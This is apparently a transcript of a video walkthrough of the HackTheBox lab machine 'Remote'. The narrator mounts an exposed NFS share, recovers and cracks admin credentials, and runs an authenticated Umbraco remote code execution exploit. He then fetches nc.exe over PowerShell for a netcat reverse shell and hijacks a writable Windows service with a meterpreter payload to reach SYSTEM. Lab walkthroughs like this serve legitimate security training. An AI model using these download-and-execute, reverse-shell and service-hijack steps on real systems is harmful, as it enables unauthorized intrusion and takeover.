Happy Saturday, welcome back. I am Justin from Parity InfoSec, and I'm here to cover the newest retirement from HackTheBox, Remote. Remote is a Windows-based VM put out by Mr. Ben. It's fairly simple. There will be some weird things as we start to enumerate into the NFS. So we'll dig into some commands like show mount, as well as just mounting that NFS drive. Do some enumeration on that to find some of the clues and logins, and that'll get us to a remote code execution on Umbraco. So we'll use that remote code execution combined with some Microsoft extensible style sheet kind of payloads to just run command, run command, run command. I'll be able to show blind ICMP traffic, so basically blind ping back to get us started, and then I'll show a netcat reverse shell. With that reverse shell, we'll be able to dig in a little bit. We'll talk about SysInternals AccessChk because we're going to go after a service. This service has write access, which allows us to write whatever we want. It's fairly basic, but there's a lot of snags in terms of where can you save files, as well as how to get that going. I was not able to get it going with a bat on this latest version. I had a bat earlier, but I know that I 100% got it working with an MSF Venom payload. So I'm going to show some of the METERPRETER side of the house and how you can use that in this kind of beginner video. With that, let's get started. As usual, we're going to go ahead and start with an NMap. So just an NMap T5 10 180, and we'll run all normal ports and let that go. We can see here that there's an FTP server, there is an HTTP, there's your standard Windows 135, 139, 445, 111, and then there's the additional 2049 NFS. So it's a file share. If you go and you search version and scripts, you're going to find some of that information. But I'm going to show the tools for NFS a little bit differently. Yeah, so let's get started. We'll just do FTP 180. Just check out any anonymous apt-get.com. So it allows anonymous logins. There's nothing in here, nothing you can grab. It's a great exfil point. But for right now, yeah, we'll go ahead and put that back. There is a port 80 open, so let's take a look at the HTTP traffic. Now this one, it takes a minute for it to start passing traffic, so it looks like it's broken, but it does catch up. It happens every time that I've looked at this box. But we are on Acme Widgets. So Acme Widgets does have products. We'll go ahead and see where it gets us. So Umbracos. So it's kind of given a little bit of a giveaway that this is what they're using. We can go to people. Now I went down this rabbit hole. You can kind of look at people's information. Not super important. The enumeration on here can send you down a lot of rabbit holes. I took down this information. I tried to do some enumeration on those folks. There's a starter kit. This is all kind of hinting at that Umbraco. And even there, it's right there. Just kind of hinting at that being an option. There is a contact form. I wasn't able to do anything with that, so we'll actually skip over here to intranet. So the intranet kind of drops you here at this page. Let's take a look at view source. There's really not a lot going on. I want to go back and look at the view source of the main page. And here it had a couple different weird things. Add links to categories. So these are comments, so to do. Every time there's a comment from HackTheBox, it's usually a good indicator. So CG16, Code Garden, Umbraco, great, Umbraco. It's hinting at this, hinting at this. I didn't notice at first, so it's a lot more obvious when you go back and take a look at it. I really want to get into that net file share because they're really starting to be a lot less common. So let's clear this screen. With some issues I had with my computer this week. I built a brand new computer. It's awesome. I actually crashed the entire system, had to rebuild it again, but I had two different VMs going and I tried to get Kali 2020.3 up and running, but it just seemed to have more issues than Parrot at this point. So I went ahead and did this all with Parrot. But one of the things that Parrot didn't have was the show mount command. I've got it installed right now, but I do some tracking things down, and good tip for anybody that's trying to use a command and it says that you don't have that command and you start doing an apt-get and you can't find it. It's really frustrating, but this is a neat little tool. So you can do a sudo apt cache. So it'll look through the entire cache and just do a search and show mount. And when you do that, it'll tell you, like in this case, if you're looking for the command show mount, it's actually inside of this. So you need to do a sudo apt-get on this, the NFS common, to get those support files. So you just do sudo apt-get install NFS common, and you'll be able to do it. And like that, you can do a show mount, no problem. So with show mount, we're going to try and see what's out there. So you want to look at TAC-E, which is an export list, see what's available from that site. And from this one, it tells you everyone has access to a /site underscore backups. Keep that in mind. And this is what we want to try and mount. So if you're going to mount, you need to make a directory first that you want to mount it to, or a point to mount it to. In this case, I'm just going to use, I have a folder called 180, and I'll use that one. So mount. And then I couldn't get it working until you really specify. You have to say it's an NFS share. So mount T NFS. We'll go ahead and put in 10, 10, 10, 180. And it's /site underscore backups. So you got to say where it's at, and then you got to say what the folder is with a colon in between, and then where I want to put it. So in this case, HackTheBox 180. Ran into this a few times. Sudo. So sudo mount, we got it there. So if I go to HTTP 180 and I look around, this is the NFS, the network file share that is available on the 180 box. So there's gonna be something in here, right? All right, there's a lot of folders. One of the tricks that I started playing around with today was really just grepping. And in this case, grepping for HackTheBox, because this is what you're dealing with. If you're trying to get first blood and things like that, I'm sure they've developed all these tools really quickly, enumerate the systems. So in this case, I want to just do, I'm in this folder, so I'll do a grep. I want to do recursive. And then I want to specify that I'm looking for HackTheBox, honestly. So I can put it in quotes. I don't need to, but I'll go ahead and put it in quotes. We're going to look through all the files recursively in this NFS, essentially, for anything with HTTP. And we're starting to see a lot of stuff here. Login attempt succeeded. All this information here is coming from the Umbraco trace logs. This is, tried to log in as admin, didn't work. Okay. So there's a neat little thing I found. There's also a binary file that has something in that. We'll take a look at that in a little bit. But when you do grep for HackTheBox, we found all of these logins. I want to try and just limit it so I can see what is coming out. So let's go ahead and extend this out a little bit so we can take a look. All right, so login attempt succeeded. These are all succeeded. Okay, there's a failed right there. So login attempt succeeded, login attempt failed. So just like if you're trying to do Hydra or something else, you just want to find something that appears in every single message so we can take a better look. So I'll say login attempt, and it should come back with succeeded and failed. And if we start at the top, admin at htb.local, local, failed for username, Umbraco admin 123, exclamation, exclamation. So this is something I've seen in real world where if you go and you look at logs, look for somebody that would have logged in and maybe they didn't realize they were on the username field instead of the password field, and they'll submit their password as their username, and then really quickly after that, they'll go back and they'll log in. And that's kind of an interesting one. You had a fail here with what looks like a password at 21:36, and 6 seconds later, you had a successful login from admin at htb.local. So that looks pretty suspicious just in terms of that. Knowing that this is this Umbraco, let's take a look at this. So if you go here, hey, you got to log in. Admin at htb.local, and then we'll go back over here and try this password. Now this one doesn't actually work, but that is a really cool trick I wanted to show you because it is very common in the actual pen test community. When we were going through this last check, there was this binary file. I want to see what that is. So we'll do a cd, oops, cancel that, cd, that was app data. We'll do an ls. So there's a config file. We'll just take a look. It's a web config. You're seeing keys. Writer name is admin. So this is really some of the blog posts that are out there. It's a little cut. Got a little Wile E. Coyote comment in here. And not, I mean, there's not a whole lot, but it was kind of an interesting little config file. And I didn't find anything deep in here that was of value. All these little blog posts. But take a look at this one. We'll say file Umbraco.sdf. It's a data. If you look up what a SDF file is, that is their database. So the database with all the information is that file right there. And when you're looking at a binary or a weird piece of data, one of the first things that's really helpful is just say, give me strings. I just want to look at whatever data I can find in there, and then I'll say more. And this one has all the domain information, all this stuff, but up at the top you see admin, admin default English, admin, admin default English US. This is that this is the code for the admin person when it comes to the blogs. Admin, admin, this. And it says it's a SHA-1 hash. That is a SHA-1 hash. It looks a lot like an NTLM. But let's take it over to CrackStation real quick. I put it right in here. We got a valid password or a valid string of some kind, bacon and cheese. There is another user, Smith, S Smith, S Smith. If If you go back and you look at those login succeeded, login failed, there are some in there for Smith, S. Smith, but right now we have a possible password. So let's take that one back over here. And we still have admin@htb.local, and we will say bacon and cheese. And we're in. It's a little content management system. We can take a look around. This is just saying that we're admin. There's content, media, settings, developer. There's a question mark down here for help. And it says it's version 7.12.4. So always a pretty good one. Just take a look. And what you're going to come up with is there's a variety of execution, remote code execution items out here. Let's take a look at this one. This 46153. This is a Python script. It's got that import. It's got beautiful soup. And what you're going to see is that this is authenticated. So if you had gone and said, let me look for Umbraco remote code execution, you might have found it. But you needed to have a login and a password. In this case, we were able to pull that down. We've got access over here. So let's see if we can play around with this. All right. For me, I'll just usually hit view raw, copy it all, and we'll come back over here. All right, nano exploit. All right, let's take a look. So this one goes through, it's going to use request. It says here's the calc payload, execute a calc for the POC. And you see it right here. So this is the Microsoft extensible style sheet kind of code. There's two fields. You'll see this every now and then, but there's two fields you want to play around with. And file name is whatever executable is being run. And then there's a spot over here called string command. And this is where you would put your arguments. So we'll just leave that for right now. We'll play around. They did leave login and password unassigned. They didn't set this up, but you could script this all out. And I looked at it, and you could also script out the whole thing and say, just give me a prompt. And with that prompt, you can have it loop, loop, loop. It's a little bit more than I wanted to get into, but we'll just show you right quick how to do this one. So we know that that's the login. Password is bacon and cheese. And then the host. HTTP is required on this one. If you run it without it, it'll tell you, I don't know what I'm trying to look at. All right. So it's going to get the main page, grab a cookie. It's going to run the API login, and it's going to log in those credentials, hit the API backend, and it's going to be able to hand it that style sheet, which is a visualization tool built in. It'll generate it for you, and then it'll hit a post and just post that and run. Okay. So with this one, the first thing I wanted to try and just show was, in this event, you're not going to get any response. There's nothing built in to kick back any kind of response. So this is something that gets taught in OSCP if you haven't done it, is just try and get blind confirmation. So out of band communication is essentially what you're looking for. Outside of the normal comm that you're communicating back and forth with this, we're going to try and do a ping on the side. So we're going to see if we can get remote code execution on the back end of the box and have it ping us outside of what we're trying to do with this exploit right now. So in this case, I'll just do 10.10.14.26 with ping. All right, clean this up a little bit, open a new, and this is another thing that I had to install was TCP dump. Not sure why it wasn't built in. But TCP dump, you can say interface, just do ton 0 for the tunnel that you're using, and then ICMP. And it'll isolate it just to those packets. And we'll give it a password. All right. So we will come back over here and say Python exploit py run. And it started and it made that packet. And you come back over here and you see that 10.10.10.180 is sending a ping request to me on 14.26, and then I'm sending a response back. 1, 2, 3, 4. That's pretty standard if you're looking at Windows. So we know that we're getting blind code execution, but like I said, you're not going to see anything showing up here. So the first thing I really want to do is try and dig into this now that we've got the remote code execution and see if we can get a payload functioning at the shell level. The easiest one is usually a netcat, but the problem that I ran into on this one is not being able to see the error messages coming back. There is an error trying to run it, and there's an error trying to save it. And that's just a matter of, you need to have an out file. You need to know where you're saving it at on this box. It says, I don't know what to do. I don't know where to put it. It doesn't default to putting it right into the directory that it's in. That's fixable by specifying a world writable directory. And in this case, Windows, a really easy one is just C users public. So we're going to play around in that directory real quick, try and see if we can get an actual netcat PowerShell back. All right. So I've got NCEXE already on the system. I've already put it into my var www. What I need to do is get over there and start my server. So we'll just come over here and do sudo python 3 and specify HTTP server on 80. We're going to see if we can get some code execution. So it's kind of cumbersome to keep jumping in here, but it's the easiest way to do it. Everything I do from here on, I'm trying to use PowerShell. So we'll use PowerShell.exe, and we're going to do a web request to URI 10.10.10.26 or 10.10.14.26, and we'll try and just do nc.exe. If I do this, you will see it pull. If I come over here, you'll see it pull. But one of the problems is that you have nowhere to run it from. So I want to specify here to put it into out file, C users public, and then we'll just call it nc.exe. This system doesn't have any antivirus or anything that's going to pull it off or flag it, so we're pretty safe there. I'm going to run that. You're going to see it, hopefully see it pull again. This one has a few snags. So let's take a look at this again. Out file. There's a couple times I had to actually pull the entire thing back out from the original exploit. So that one's working. And I'm not 100% sure why. We'll try it again. We'll try and oh, this one required forward slashes. I remember that. And it's just a fluke of how it was working. So public nc.exe. And every time you have an error, you're not seeing the errors because there's no way to get that information on this system. So we know that we sent it, it pulled it down, and hopefully it's sitting in that directory. So if we come back in here and we just say run PowerShell on C users public nc.exe, and then we're going to direct it at 10.10.10.10.14.26. We'll just do all 9s, and we're going to say, hit me with the PowerShell. I've already confirmed this. We'll go ahead and clean this up. Do sudo rl wrap on an nc nblp 44 or all 9s. Just want to make sure that I got that part. So we're going to try and launch that. Let's see what it gets us. All right, so you see it hang there, and then here's our shell. Who am I? Okay, so we're sitting as the IIS service, which makes sense. Exploited that. So let's go to users. And we're in public. If I do a dir, you're going to see there's where that netcat got dropped, and here's also where user's at. So if I just say cat user, actually PowerShell will do cat, but let's just do type user.txt, and we've got user. Great. Some of this seems easy, some of it not. A lot of this box was just enumeration and knowing where to look. It was definitely on the harder side of an easy box because of the rabbit holes. So I've kind of guided you to the user. There's a lot of different ways you can go here, but it's actually a really simple one once you can find that enumeration, and it's just a service issue. In order to find the service that is vulnerable, we need to use AccessChk. So AccessChk is a tool from SysInternals put out by Microsoft. It's been around for a long time. It's one of many tools that's pretty handy. That's going to allow us to take a look at which users have which permissions on which services. And in this case, we're looking for a writable service that we can modify it and then have access, but we need it to be at the NC authority service level. So let's go ahead. I've already done the AccessChk, but you can find it on Microsoft. So if you just do SysInternals and then you say AccessChk, I would 100% only download it from the Microsoft website. This one could be kind of quirky. If somebody's out there putting out malicious, you don't want to mess around with it. So get it from the source. Microsoft did develop it, and they have it. So it's a safe source. When you download this, it's going to be 2 different files. One's going to be a 32-bit, one's going to be a 64-bit. So let's take a look at system info. And we'll just scroll up here. And I just want to confirm system type is x64. So before I go and pull down the file, I want to know if it's a 32 or 64. All right. So it's already in my directory. I'll just do an IWR, URI, 10.10.14.26, AccessChk 64.exe. Now, I want to do this because I want to show you what happens. This is the error that we couldn't see when we were trying to do those invoke web requests before. And it's just saying it can't be parsed because the Internet Explorer engine is not available. It doesn't know what to do when it pulls down a file. So you have to specify what to do. In this case, if I come in here and I say out file, C users public AccessChk 64.exe, it processes it fine, and when you look in the directory, there it is right there. So when you're on this site, it'll also tell you all the different switches that you can use. So in this case, we're going to use 5 switches. One being U, suppress errors. We're also going to run W, which is we're looking for that object with write access. We need to be able to write to it to modify it. Okay, we're going to do a Q, which is just omit banner. It just cleans it up a little bit. Well, at the same time, we're going to run a V for verbose. We want to know all the information about that service that it's going to provide. And then the last one is C, which is actually say, name a Windows service. And then you can specify a star as the name of the services that you're trying to look at. And in this case, we will use a star, an asterisk. All right, so it's sitting on this box. We're just going to say, AccessChk64.exe, and then we'll specify the UWQVC, and we're going to say NT authority system star. Nope. The command AccessChk was not found. Don't think it liked the slash, so let's do a cmd/c and try and run it that way. Okay, so some of these commands I ran when I was running a standard command shell. When you're running PowerShell, you have to actually push it back into command to see some of this. But there's also this error that you see with AccessChk where you have to accept a EULA first, so the end user license agreement, and that's just by putting in a -accept EULA. So we'll run this command, and I'll put it up here on the front end. Okay, so that's a slight typo on my end. NT authority service, not system. And it looks like it might be a backslash. So when you run that, it's kind of funny, but there's only one service pops up. It's a pretty good indicator. So we'll start with just the service control. So SC, and then what we're going to do is query that service. So tell me about that service. Again, this is a flaw of using PowerShell. I should have probably run a command. All right, so we'll just kick ourselves in a command. It'll be a lot easier. SC QC USO service. And it's going to say, okay, this is the command it runs. This is its display name, the orchestrator service. So we have write access, and it runs at the NT authority service level. So this is the process that we want to modify, and it's really pretty simple. So you're going to say SC stop USO service. So it's stop pending. You can come in here and now say SC config, and you can change information. First you want to say which service it is, and then you're going to say I want to change the binary path. I want to change what it's looking at. Now, I've tried this several times, and the easiest thing for me was to actually use a Metasploit exploit. So I'm going to back up. We're back into PowerShell. I'm going to make a file here. So MSF Venom. And these are so plentiful, I'll just search for it. Just one of these various different sites. And we want a Windows METERPRETER reverse TCP shell. So we'll just copy that, bring it on over, and add in our lhost lport information. Looks good. Go ahead and run that at the same time. I'll make a new window, and we're going to start up at MSF console, and we're going to run it at root permissions. Our shell has been made, so sudo cp, and we're going to just copy shell to var html. Cool. My file is there, so I'll be able to get it. I need to set up my listener here, so just use exploit multi-handler. We're gonna set payload, and in this one it's Windows interpreter reverse TCP. Show options, we'll just say set L host, and on this one again you can do a ton 0. Super easy. It'll just know what it is. Set L port to 443. If you don't run this MSF console as sudo, you're not going to be able to run ports 443, 80, anything under 1024 without hitting an error. So now that it's set up, I'll just set that to run in the background. Let's go back to our box. So on our box, we have the ability to, we're in the right spot, so let's just do an IWR URI again. 26, and I want shell.exe, and we will put it into C users public. Oops. So if you didn't notice, when I first ran this, I ran rl wrap as a command. That allows you to have up, down, privileges, left, right, which you normally wouldn't have if you're just running a normal netcat. So I've got this shell, we're going to put it into that folder. We can see that it did pull over and it did save. dir, we have a shell.exe. I don't know what that QC is, that's a little weird. Let's go back to our command. We're going to say scconfig USO service. We're going to say bin path equals, and then you have to do a space. That's just how it works. C users public shell.exe, and it says change service config success, and then sc start USO service, and you see it hang there for a minute. It's because it's actually processing. If you come over here, we'll just do a sessions tac I 1. And you see NT authority system. So we'll go over to administrator, dir, go into that desktop. Ah, it crashed. So this is one of the issues with it. So you just gotta say, go ahead, terminate that channel. Yeah. Make sure, so there's nothing back there. We're gonna exploit in the background, and then one of the fun games of doing a migration. If you run this as a netcat handler, you don't run into that issue quite as much. But it will die because it's trying to start that service. And now you can see where it was hanging, and then it failed over. That's what it was doing. There's a trick to this, and I'm going to show you in a little bit, but I want to try and just show the migration first. So we're going to get a new session, so sessions, tac I, and really you can do a search post, search migrate. So post Windows migrate, and you can just say use 10 show options. You want to try and set name to LSAS, and I already lost my other shell, so it's always nice to have this set up ahead of time. We can set the session to 3 because that's going to be the next one that we run. So let's make sure we have this ready. The challenge I'm going to have is I actually need to go back and say use exploit multi-handler. It's still set up for everything that we need, so we can just say exploit J in the back, and then we'll go back to search migrate, use 10, show options. So the name of the process to migrate should be good enough. And we'll see if this one works. There's a couple different ways to go about this. So go back over to this window and this window. We'll run it. We'll get our session. We'll run this. And we're trying to migrate right now. And so it migrated a new process of Notepad. So it couldn't find LSASS, so it just said, forget it, I'm going to run notepad.exe, migrate to that. So if you do sessions, it's still sitting there. Sessions, tech i3. Now we can do a shell. C, cd, users, administrator, desktop. And there's root. So if we just say type root.txt, you've got root. So perfect. We got root. We got there. This box is done. I'm going to show a couple real quick things. Some of the tricks that I ran into. If you do want to run, you can run an auto migrate. Go ahead and exit out of this one. So if you say migrate, while you're in the METERPRETER session, before you even go in and hit the shell, you can say, let's start with PS. So PS, we can see there was an lsas.exe, so I could have done that. So you can just say migrate tac n lsas.exe. And that would have done the same exact thing that module for migrate did when we were back out in the main METERPRETER area. The two ways to go about the same exact trick. So that is remote, quick and dirty, trying to get through it. There's a lot of enumeration, like I said, that you can get caught up in, but really just keep it simple. Keep some of these tactics in your tool bag for later. Again, I'd like to thank Mr. Ben for making this box. It's a nice way to practice those service exploits. You don't see too many of those boxes around, but you'll see some of them on Bullen Hub. Again, here's all my information, so I appreciate you guys coming out watching. If you have any comments, leave them in the block below, and hopefully we'll get together again next week and we'll take out another box. Till then, have a great weekend. Have a great week.